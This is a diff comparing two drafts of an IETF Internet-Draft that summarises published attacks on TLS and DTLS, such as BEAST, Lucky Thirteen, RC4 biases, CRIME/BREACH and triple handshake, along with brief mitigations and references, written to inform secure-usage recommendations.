draft-ietf-uta-tls-attacks-01.txt | draft-ietf-uta-tls-attacks-02.txt | |||
---|---|---|---|---|
uta Y. Sheffer | uta Y. Sheffer | |||
Internet-Draft Porticor | Internet-Draft Porticor | |||
Intended status: Informational R. Holz | Intended status: Informational R. Holz | |||
Expires: December 26, 2014 TUM | Expires: February 13, 2015 TUM | |||
P. Saint-Andre | P. Saint-Andre | |||
&yet | &yet | |||
June 24, 2014 | August 12, 2014 | |||
Summarizing Current Attacks on TLS and DTLS | Summarizing Current Attacks on TLS and DTLS | |||
draft-ietf-uta-tls-attacks-01 | draft-ietf-uta-tls-attacks-02 | |||
Abstract | Abstract | |||
Over the last few years there have been several serious attacks on | Over the last few years there have been several serious attacks on | |||
TLS, including attacks on its most commonly used ciphers and modes of | TLS, including attacks on its most commonly used ciphers and modes of | |||
operation. This document summarizes these attacks, with the goal of | operation. This document summarizes these attacks, with the goal of | |||
motivating generic and protocol-specific recommendations on the usage | motivating generic and protocol-specific recommendations on the usage | |||
of TLS and DTLS. | of TLS and DTLS. | |||
Status of This Memo | Status of This Memo | |||
skipping to change at page 1, line 37 | skipping to change at page 1, line 37 | |||
Internet-Drafts are working documents of the Internet Engineering | Internet-Drafts are working documents of the Internet Engineering | |||
Task Force (IETF). Note that other groups may also distribute | Task Force (IETF). Note that other groups may also distribute | |||
working documents as Internet-Drafts. The list of current Internet- | working documents as Internet-Drafts. The list of current Internet- | |||
Drafts is at http://datatracker.ietf.org/drafts/current/. | Drafts is at http://datatracker.ietf.org/drafts/current/. | |||
Internet-Drafts are draft documents valid for a maximum of six months | Internet-Drafts are draft documents valid for a maximum of six months | |||
and may be updated, replaced, or obsoleted by other documents at any | and may be updated, replaced, or obsoleted by other documents at any | |||
time. It is inappropriate to use Internet-Drafts as reference | time. It is inappropriate to use Internet-Drafts as reference | |||
material or to cite them other than as "work in progress." | material or to cite them other than as "work in progress." | |||
This Internet-Draft will expire on December 26, 2014. | This Internet-Draft will expire on February 13, 2015. | |||
Copyright Notice | Copyright Notice | |||
Copyright (c) 2014 IETF Trust and the persons identified as the | Copyright (c) 2014 IETF Trust and the persons identified as the | |||
document authors. All rights reserved. | document authors. All rights reserved. | |||
This document is subject to BCP 78 and the IETF Trust's Legal | This document is subject to BCP 78 and the IETF Trust's Legal | |||
Provisions Relating to IETF Documents | Provisions Relating to IETF Documents | |||
(http://trustee.ietf.org/license-info) in effect on the date of | (http://trustee.ietf.org/license-info) in effect on the date of | |||
publication of this document. Please review these documents | publication of this document. Please review these documents | |||
skipping to change at page 2, line 18 | skipping to change at page 2, line 18 | |||
Table of Contents | Table of Contents | |||
1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . 2 | 1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . 2 | |||
2. Attacks on TLS . . . . . . . . . . . . . . . . . . . . . . . 3 | 2. Attacks on TLS . . . . . . . . . . . . . . . . . . . . . . . 3 | |||
2.1. SSL Stripping . . . . . . . . . . . . . . . . . . . . . . . 3 | 2.1. SSL Stripping . . . . . . . . . . . . . . . . . . . . . . . 3 | |||
2.2. BEAST . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 | 2.2. BEAST . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 | |||
2.3. Lucky Thirteen . . . . . . . . . . . . . . . . . . . . . . 3 | 2.3. Lucky Thirteen . . . . . . . . . . . . . . . . . . . . . . 3 | |||
2.4. Attacks on RC4 . . . . . . . . . . . . . . . . . . . . . . 3 | 2.4. Attacks on RC4 . . . . . . . . . . . . . . . . . . . . . . 3 | |||
2.5. Compression Attacks: CRIME and BREACH . . . . . . . . . . . 4 | 2.5. Compression Attacks: CRIME and BREACH . . . . . . . . . . . 4 | |||
2.6. Certificate Attacks . . . . . . . . . . . . . . . . . . . . 4 | 2.6. Certificate Attacks . . . . . . . . . . . . . . . . . . . . 4 | |||
2.7. Diffe-Hellman Parameters . . . . . . . . . . . . . . . . . 4 | 2.7. Diffie-Hellman Parameters . . . . . . . . . . . . . . . . . 4 | |||
2.8. Denial of Service . . . . . . . . . . . . . . . . . . . . . 4 | 2.8. Renegotiation . . . . . . . . . . . . . . . . . . . . . . . 5 | |||
3. Security Considerations . . . . . . . . . . . . . . . . . . . 5 | 2.9. Triple Hanshake . . . . . . . . . . . . . . . . . . . . . . 5 | |||
4. IANA Considerations . . . . . . . . . . . . . . . . . . . . . 5 | 2.10. Denial of Service . . . . . . . . . . . . . . . . . . . . . 5 | |||
5. Acknowledgements . . . . . . . . . . . . . . . . . . . . . . 5 | 2.11. Implementation Issues . . . . . . . . . . . . . . . . . . . 5 | |||
6. References . . . . . . . . . . . . . . . . . . . . . . . . . 5 | 3. Applicability to DTLS . . . . . . . . . . . . . . . . . . . . 6 | |||
6.1. Normative References . . . . . . . . . . . . . . . . . . . 5 | 4. Security Considerations . . . . . . . . . . . . . . . . . . . 6 | |||
6.2. Informative References . . . . . . . . . . . . . . . . . . 5 | 5. IANA Considerations . . . . . . . . . . . . . . . . . . . . . 6 | |||
Appendix A. Appendix: Change Log . . . . . . . . . . . . . . . . 7 | 6. Acknowledgments . . . . . . . . . . . . . . . . . . . . . . . 6 | |||
A.1. draft-ietf-uta-tls-bcp-01 . . . . . . . . . . . . . . . . . 7 | 7. Informative References . . . . . . . . . . . . . . . . . . . 6 | |||
A.2. draft-ietf-uta-tls-bcp-00 . . . . . . . . . . . . . . . . . 7 | Appendix A. Appendix: Change Log . . . . . . . . . . . . . . . . 9 | |||
A.3. draft-sheffer-uta-tls-bcp-00 . . . . . . . . . . . . . . . 7 | A.1. draft-ietf-uta-tls-attacks-02 . . . . . . . . . . . . . . . 9 | |||
Authors' Addresses . . . . . . . . . . . . . . . . . . . . . . . 8 | A.2. draft-ietf-uta-tls-attacks-01 . . . . . . . . . . . . . . . 9 | |||
A.3. draft-ietf-uta-tls-attacks-00 . . . . . . . . . . . . . . . 9 | ||||
Authors' Addresses . . . . . . . . . . . . . . . . . . . . . . . 9 | ||||
1. Introduction | 1. Introduction | |||
Over the last few years there have been several major attacks on TLS | Over the last few years there have been several major attacks on TLS | |||
[RFC5246], including attacks on its most commonly used ciphers and | [RFC5246], including attacks on its most commonly used ciphers and | |||
modes of operation. Details are given in Section 2, but suffice it | modes of operation. Details are given in Section 2, but suffice it | |||
to say that both AES-CBC and RC4, which together make up for most | to say that both AES-CBC and RC4, which together make up for most | |||
current usage, have been seriously attacked in the context of TLS. | current usage, have been seriously attacked in the context of TLS. | |||
This situation motivated the creation of the UTA working group, which | This situation motivated the creation of the UTA working group, which | |||
is tasked with the creation of generic and protocol-specific | is tasked with the creation of generic and protocol-specific | |||
recommendation for the use of TLS and DTLS. | recommendations for the use of TLS and DTLS. | |||
"Attacks always get better; they never get worse" (ironically, this | "Attacks always get better; they never get worse" (ironically, this | |||
saying is attributed to the NSA). This list of attacks describes our | saying is attributed to the NSA). This list of attacks describes our | |||
knowledge as of this writing. It seems likely that new attacks will | knowledge as of this writing. It seems likely that new attacks will | |||
be invented in the future. | be invented in the future. | |||
For a more detailed discussion of the attacks listed here, the | For a more detailed discussion of the attacks listed here, the | |||
interested reader is referred to [Attacks-iSec]. | interested reader is referred to [Attacks-iSec]. | |||
2. Attacks on TLS | 2. Attacks on TLS | |||
skipping to change at page 3, line 18 | skipping to change at page 3, line 21 | |||
recommendations. This is not intended to be an extensive survey of | recommendations. This is not intended to be an extensive survey of | |||
TLS's security. | TLS's security. | |||
While there are widely deployed mitigations for some of the attacks | While there are widely deployed mitigations for some of the attacks | |||
listed below, we believe that their root causes necessitate a more | listed below, we believe that their root causes necessitate a more | |||
systemic solution. | systemic solution. | |||
2.1. SSL Stripping | 2.1. SSL Stripping | |||
Various attacks attempt to remove the use of SSL/TLS altogether, by | Various attacks attempt to remove the use of SSL/TLS altogether, by | |||
modifying HTTP traffic and HTML pages as they pass on the wire. | modifying unencrypted protocols that request the use of TLS, | |||
These attacks are known collectively as SSL Stripping, and were first | specifically modifying HTTP traffic and HTML pages as they pass on | |||
introduced by Moxie Marlinspike [SSL-Stripping]. In the context of | the wire. These attacks are known collectively as SSL Stripping, and | |||
Web traffic, these attacks are only effective if the client accesses | were first introduced by Moxie Marlinspike [SSL-Stripping]. In the | |||
a Web server using a mixture of HTTP and HTTPS. | context of Web traffic, these attacks are only effective if the | |||
client accesses a Web server using a mixture of HTTP and HTTPS. | ||||
2.2. BEAST | 2.2. BEAST | |||
The BEAST attack [BEAST] uses issues with the TLS 1.0 implementation | The BEAST attack [BEAST] uses issues with the TLS 1.0 implementation | |||
of CBC (that is, the predictable initialization vector) to decrypt | of CBC (that is, the predictable initialization vector) to decrypt | |||
parts of a packet, and specifically to decrypt HTTP cookies when HTTP | parts of a packet, and specifically to decrypt HTTP cookies when HTTP | |||
is run over TLS. | is run over TLS. | |||
2.3. Lucky Thirteen | 2.3. Lucky Thirteen | |||
A consequence of the MAC-then-encrypt design in all current versions | A consequence of the MAC-then-encrypt design in all current versions | |||
of TLS is the existence of padding oracle attacks [Padding-Oracle]. | of TLS is the existence of padding oracle attacks [Padding-Oracle]. | |||
A recent incarnation of these attacks is the Lucky Thirteen attack | A recent incarnation of these attacks is the Lucky Thirteen attack | |||
[CBC-Attack], a timing side-channel attack that allows the attacker | [CBC-Attack], a timing side-channel attack that allows the attacker | |||
to decrypt arbitrary ciphertext. | to decrypt arbitrary ciphertext. | |||
The Lucky Thirteen attack can be mitigated by using authenticated | ||||
encryption like AES-GCM [RFC5288] and encrypt-then-mac | ||||
[I-D.ietf-tls-encrypt-then-mac] instead of the TLS default of MAC- | ||||
then-encrypt. | ||||
2.4. Attacks on RC4 | 2.4. Attacks on RC4 | |||
The RC4 algorithm [RC4] has been used with TLS (and previously, SSL) | The RC4 algorithm [RC4] has been used with TLS (and previously, SSL) | |||
for many years. RC4 has long been known to have a variety of | for many years. RC4 has long been known to have a variety of | |||
cryptographic weaknesses, e.g. [RC4-Attack-Pau], [RC4-Attack-Man], | cryptographic weaknesses, e.g. [RC4-Attack-Pau], [RC4-Attack-Man], | |||
[RC4-Attack-FMS]. Recent cryptanalysis results [RC4-Attack-AlF] | [RC4-Attack-FMS]. Recent cryptanalysis results [RC4-Attack-AlF] | |||
exploit biases in the RC4 keystream to recover repeatedly encrypted | exploit biases in the RC4 keystream to recover repeatedly encrypted | |||
plaintexts. | plaintexts. | |||
These recent results are on the verge of becoming practically | These recent results are on the verge of becoming practically | |||
exploitable; currently they require 2^26 sessions or 13x2^30 | exploitable; currently they require 2^26 sessions or 13x2^30 | |||
encryptions. As a result, RC4 can no longer be seen as providing a | encryptions. As a result, RC4 can no longer be seen as providing a | |||
sufficient level of security for TLS sessions. | sufficient level of security for TLS sessions. For further details, | |||
the reader is refered to [I-D.ietf-tls-prohibiting-rc4]. | ||||
2.5. Compression Attacks: CRIME and BREACH | 2.5. Compression Attacks: CRIME and BREACH | |||
The CRIME attack [CRIME] allows an active attacker to decrypt | The CRIME attack [CRIME] allows an active attacker to decrypt | |||
ciphertext (specifically, cookies) when TLS is used with protocol- | ciphertext (specifically, cookies) when TLS is used with TLS level | |||
level compression. | compression. | |||
The TIME attack [TIME] and the later BREACH attack [BREACH] both make | The TIME attack [TIME] and the later BREACH attack [BREACH] both make | |||
similar use of HTTP-level compression to decrypt secret data passed | similar use of HTTP-level compression to decrypt secret data passed | |||
in the HTTP response. We note that compression of the HTTP message | in the HTTP response. We note that compression of the HTTP message | |||
body is much more prevalent than compression at the TLS level. | body is much more prevalent than compression at the TLS level. | |||
The former attack can be mitigated by disabling TLS compression, as | The former attack can be mitigated by disabling TLS compression. We | |||
recommended below. We are not aware of mitigations at the protocol | are not aware of mitigations at the TLS protocol level to the latter | |||
level to the latter attack, and so application-level mitigations are | attack, and so application-level mitigations are needed (see | |||
needed (see [BREACH]). For example, implementations of HTTP that use | [BREACH]). For example, implementations of HTTP that use CSRF tokens | |||
CSRF tokens will need to randomize them even when the recommendations | will need to randomize them even when the recommendations of | |||
of [I-D.ietf-uta-tls-bcp] are adopted. | [I-D.ietf-uta-tls-bcp] are adopted. | |||
2.6. Certificate Attacks | 2.6. Certificate Attacks | |||
There have been several practical attacks on TLS when used with RSA | There have been several practical attacks on TLS when used with RSA | |||
certificates (the most common use case). These include | certificates (the most common use case). These include | |||
[Bleichenbacher98] and [Klima03]. While the Bleichenbacher attack | [Bleichenbacher98] and [Klima03]. While the Bleichenbacher attack | |||
has been mitigated in TLS 1.0, the Klima attack that relies on a | has been mitigated in TLS 1.0, the Klima attack that relies on a | |||
version-check oracle is only mitigated by TLS 1.1. | version-check oracle is only mitigated by TLS 1.1. | |||
The use of RSA certificates often involves exploitable timing issues | The use of RSA certificates often involves exploitable timing issues | |||
[Brumley03], unless the implementation takes care to explicitly | [Brumley03], unless the implementation takes care to explicitly | |||
eliminate them. | eliminate them. | |||
2.7. Diffe-Hellman Parameters | 2.7. Diffie-Hellman Parameters | |||
TLS allows to define ephemeral Diffie-Hellman and Elliptic Curve | TLS allows to define ephemeral Diffie-Hellman and Elliptic Curve | |||
Diffie-Hellman parameters in its respective key exchange modes. This | Diffie-Hellman parameters in its respective key exchange modes. This | |||
results in an outstanding attack, detailed in [Cross-Protocol]. In | results in an outstanding attack, detailed in [Cross-Protocol]. In | |||
addition, clients that do not properly verify the received parameters | addition, clients that do not properly verify the received parameters | |||
are exposed to MITM attacks. Unfortunately the TLS protocol does not | are exposed to man in the middle (MITM) attacks. Unfortunately the | |||
require this verification, see [RFC6989] for the IPsec analogy. | TLS protocol does not require this verification, see [RFC6989] for | |||
the IPsec analogy. | ||||
2.8. Denial of Service | 2.8. Renegotiation | |||
A major attack on the TLS renegotiation mechanism applies to all | ||||
current versions of the protocol. The attack and the TLS extension | ||||
that resolves it are described in [RFC5746]. | ||||
2.9. Triple Hanshake | ||||
The triple handshake attack [[TRIPLE-HS, add the reference when | ||||
published]] enables the attacker to cause two TLS connections to | ||||
share keying material. This leads to a multitude of attacks, e.g. | ||||
Man-in-the-Middle, breaking safe renegotiation and breaking channel | ||||
binding via TLS Exporter [RFC5705] or "tls-unique" [RFC5929]. | ||||
2.10. Denial of Service | ||||
Server CPU power has progressed over the years so that TLS can now be | Server CPU power has progressed over the years so that TLS can now be | |||
turned on by default. However the risk of malicious clients and | turned on by default. However the risk of malicious clients and | |||
coordinated groups of clients ("botnets") mounting denial of service | coordinated groups of clients ("botnets") mounting denial of service | |||
attacks is still very real. TLS adds another vector for | attacks is still very real. TLS adds another vector for | |||
computational attacks, since a client can easily (with little | computational attacks, since a client can easily (with little | |||
computational effort) force the server to expend relatively large | computational effort) force the server to expend relatively large | |||
computational work. It is known that such attacks have in fact been | computational work. It is known that such attacks have in fact been | |||
mounted. | mounted. | |||
3. Security Considerations | 2.11. Implementation Issues | |||
Even when the protocol is fully specified, the are very common issues | ||||
that often plague implementations. In particular, the integration of | ||||
higher-level protocols, TLS and its PKI-based authentication is the | ||||
source of misunderstandings and implementation "shortcuts". An | ||||
extensive survey of these issues can be found in [Georgiev2012]. | ||||
o Implementations may omit validation of the server certificate | ||||
altogether. For example, this is true of the default | ||||
implementation of HTTP client libraries in Python 2. | ||||
o Implementations may not validate the server identity. This | ||||
validation typically amounts to matching the protocol-level server | ||||
name with the certificate's Subject Alternative Name field. | ||||
o Implementations may be validating the certificate chain | ||||
incorrectly or not at all, or using an incorrect or outdated trust | ||||
anchor list. | ||||
3. Applicability to DTLS | ||||
DTLS [RFC4347] [RFC6347] is an adaptation of TLS for UDP datagrams. | ||||
With respect to the attacks described in the current document, DTLS | ||||
1.0 is equivalent to TLS 1.1. The only exception is RC4 which is | ||||
disallowed in DTLS. DTLS 1.2 is equivalent to TLS 1.2. | ||||
4. Security Considerations | ||||
This document describes protocol attacks in an informational manner, | This document describes protocol attacks in an informational manner, | |||
and in itself does not have any security implications. Its companion | and in itself does not have any security implications. Its companion | |||
documents certainly do. | documents certainly do. | |||
4. IANA Considerations | 5. IANA Considerations | |||
This document requires no IANA actions. | This document requires no IANA actions. [Note to RFC Editor: please | |||
remove this whole section before publication.] | ||||
5. Acknowledgements | 6. Acknowledgments | |||
We would like to thank Stephen Farrell, Simon Josefsson, Yoav Nir, | We would like to thank Stephen Farrell, Simon Josefsson, John | |||
Kenny Paterson, Patrick Pelletier, Tom Ritter and Rich Salz for their | Mattsson, Yoav Nir, Kenny Paterson, Patrick Pelletier, Tom Ritter and | |||
review of this document. We thank Andrei Popov for contributing text | Rich Salz for their review of this document. We thank Andrei Popov | |||
on RC4. | for contributing text on RC4, Kohei Kasamatsu for text on Lucky13, | |||
Ilari Liusvaara for text on attacks and on DTLS. | ||||
The document was prepared using the lyx2rfc tool, created by Nico | The document was prepared using the lyx2rfc tool, created by Nico | |||
Williams. | Williams. | |||
6. References | 7. Informative References | |||
6.1. Normative References | [RFC4347] Rescorla, E. and N. Modadugu, "Datagram Transport Layer | |||
Security", RFC 4347, April 2006. | ||||
[RFC5246] Dierks, T. and E. Rescorla, "The Transport Layer Security | [RFC5246] Dierks, T. and E. Rescorla, "The Transport Layer Security | |||
(TLS) Protocol Version 1.2", RFC 5246, August 2008. | (TLS) Protocol Version 1.2", RFC 5246, August 2008. | |||
6.2. Informative References | [RFC5288] Salowey, J., Choudhury, A., and D. McGrew, "AES Galois | |||
Counter Mode (GCM) Cipher Suites for TLS", RFC 5288, | ||||
August 2008. | ||||
[I-D.ietf-uta-tls-bcp] | [RFC5705] Rescorla, E., "Keying Material Exporters for Transport | |||
Sheffer, Y., Holz, R., and P. Saint-Andre, | Layer Security (TLS)", RFC 5705, March 2010. | |||
"Recommendations for Secure Use of TLS and DTLS", draft- | ||||
ietf-uta-tls-bcp-00 (work in progress), March 2014. | [RFC5746] Rescorla, E., Ray, M., Dispensa, S., and N. Oskov, | |||
"Transport Layer Security (TLS) Renegotiation Indication | ||||
Extension", RFC 5746, February 2010. | ||||
[RFC5929] Altman, J., Williams, N., and L. Zhu, "Channel Bindings | ||||
for TLS", RFC 5929, July 2010. | ||||
[RFC6347] Rescorla, E. and N. Modadugu, "Datagram Transport Layer | ||||
Security Version 1.2", RFC 6347, January 2012. | ||||
[RFC6989] Sheffer, Y. and S. Fluhrer, "Additional Diffie-Hellman | [RFC6989] Sheffer, Y. and S. Fluhrer, "Additional Diffie-Hellman | |||
Tests for the Internet Key Exchange Protocol Version 2 | Tests for the Internet Key Exchange Protocol Version 2 | |||
(IKEv2)", RFC 6989, July 2013. | (IKEv2)", RFC 6989, July 2013. | |||
[I-D.ietf-uta-tls-bcp] | ||||
Sheffer, Y., Holz, R., and P. Saint-Andre, | ||||
"Recommendations for Secure Use of TLS and DTLS", draft- | ||||
ietf-uta-tls-bcp-01 (work in progress), June 2014. | ||||
[I-D.ietf-tls-prohibiting-rc4] | ||||
Popov, A., "Prohibiting RC4 Cipher Suites", draft-ietf- | ||||
tls-prohibiting-rc4-00 (work in progress), July 2014. | ||||
[I-D.ietf-tls-encrypt-then-mac] | ||||
Gutmann, P., "Encrypt-then-MAC for TLS and DTLS", draft- | ||||
ietf-tls-encrypt-then-mac-03 (work in progress), July | ||||
2014. | ||||
[CBC-Attack] | [CBC-Attack] | |||
AlFardan, N. and K. Paterson, "Lucky Thirteen: Breaking | AlFardan, N. and K. Paterson, "Lucky Thirteen: Breaking | |||
the TLS and DTLS Record Protocols", IEEE Symposium on | the TLS and DTLS Record Protocols", IEEE Symposium on | |||
Security and Privacy , 2013. | Security and Privacy , 2013. | |||
[BEAST] Rizzo, J. and T. Duong, "Browser Exploit Against SSL/TLS", | [BEAST] Rizzo, J. and T. Duong, "Browser Exploit Against SSL/TLS", | |||
2011, <http://packetstormsecurity.com/files/105499/ | 2011, <http://packetstormsecurity.com/files/105499/ | |||
Browser-Exploit-Against-SSL-TLS.html>. | Browser-Exploit-Against-SSL-TLS.html>. | |||
[CRIME] Rizzo, J. and T. Duong, "The CRIME Attack", EKOparty | [CRIME] Rizzo, J. and T. Duong, "The CRIME Attack", EKOparty | |||
skipping to change at page 6, line 34 | skipping to change at page 8, line 16 | |||
Fluhrer, S., Mantin, I., and A. Shamir, "Weaknesses in the | Fluhrer, S., Mantin, I., and A. Shamir, "Weaknesses in the | |||
Key Scheduling Algorithm of RC4", Selected Areas in | Key Scheduling Algorithm of RC4", Selected Areas in | |||
Cryptography , 2001. | Cryptography , 2001. | |||
[RC4-Attack-AlF] | [RC4-Attack-AlF] | |||
AlFardan, N., Bernstein, D., Paterson, K., Poettering, B., | AlFardan, N., Bernstein, D., Paterson, K., Poettering, B., | |||
and J. Schuldt, "On the Security of RC4 in TLS", Usenix | and J. Schuldt, "On the Security of RC4 in TLS", Usenix | |||
Security Symposium 2013, 2013, <https://www.usenix.org/ | Security Symposium 2013, 2013, <https://www.usenix.org/ | |||
conference/usenixsecurity13/security-rc4-tls>. | conference/usenixsecurity13/security-rc4-tls>. | |||
[Georgiev2012] | ||||
Georgiev, M., Iyengar, S., Jana, S., Anubhai, R., Boneh, | ||||
D., and V. Shmatikov, "The most dangerous code in the | ||||
world: validating SSL certificates in non-browser | ||||
software", 2012, | ||||
<http://doi.acm.org/10.1145/2382196.2382204>. | ||||
[Attacks-iSec] | [Attacks-iSec] | |||
Sarkar, P. and S. Fitzgerald, "Attacks on SSL, a | Sarkar, P. and S. Fitzgerald, "Attacks on SSL, a | |||
comprehensive study of BEAST, CRIME, TIME, BREACH, Lucky13 | comprehensive study of BEAST, CRIME, TIME, BREACH, Lucky13 | |||
and RC4 biases", 8 2013, <https://www.isecpartners.com/ | and RC4 biases", 8 2013, <https://www.isecpartners.com/ | |||
media/106031/ssl_attacks_survey.pdf>. | media/106031/ssl_attacks_survey.pdf>. | |||
[Padding-Oracle] | [Padding-Oracle] | |||
Vaudenay, S., "Security Flaws Induced by CBC Padding | Vaudenay, S., "Security Flaws Induced by CBC Padding | |||
Applications to SSL, IPSEC, WTLS...", EUROCRYPT 2002, | Applications to SSL, IPSEC, WTLS...", EUROCRYPT 2002, | |||
2002, <http://www.iacr.org/cryptodb/archive/2002/ | 2002, <http://www.iacr.org/cryptodb/archive/2002/ | |||
skipping to change at page 7, line 35 | skipping to change at page 9, line 21 | |||
sessions in SSL/TLS", 2003. | sessions in SSL/TLS", 2003. | |||
[Brumley03] | [Brumley03] | |||
Brumley, D. and D. Boneh, "Remote timing attacks are | Brumley, D. and D. Boneh, "Remote timing attacks are | |||
practical", 2003. | practical", 2003. | |||
Appendix A. Appendix: Change Log | Appendix A. Appendix: Change Log | |||
Note to RFC Editor: please remove this section before publication. | Note to RFC Editor: please remove this section before publication. | |||
A.1. draft-ietf-uta-tls-bcp-01 | A.1. draft-ietf-uta-tls-attacks-02 | |||
o Added implementation issues ("most dangerous code"), | ||||
renegotiation, triple handshake. | ||||
o Added text re: mitigation of Lucky13. | ||||
o Added applicability to DTLS. | ||||
A.2. draft-ietf-uta-tls-attacks-01 | ||||
o Added SSL Stripping, attacks related to certificates, Diffie | o Added SSL Stripping, attacks related to certificates, Diffie | |||
Hellman parameters and denial of service. | Hellman parameters and denial of service. | |||
o Expanded on RC4 attacks, thanks to Andrei Popov. | o Expanded on RC4 attacks, thanks to Andrei Popov. | |||
A.2. draft-ietf-uta-tls-bcp-00 | A.3. draft-ietf-uta-tls-attacks-00 | |||
o Initial WG version, with only updated references. | ||||
A.3. draft-sheffer-uta-tls-bcp-00 | ||||
o Initial version, extracted from draft-sheffer-tls-bcp-01. | o Initial version, extracted from draft-sheffer-tls-bcp-01. | |||
Authors' Addresses | Authors' Addresses | |||
Yaron Sheffer | Yaron Sheffer | |||
Porticor | Porticor | |||
29 HaHarash St. | 29 HaHarash St. | |||
Hod HaSharon 4501303 | Hod HaSharon 4501303 | |||
Israel | Israel | |||
End of changes. 28 change blocks. | ||||
57 lines changed or deleted | 149 lines changed or added | |||
This html diff was produced by rfcdiff 1.41. The latest version is available from http://tools.ietf.org/tools/rfcdiff/ |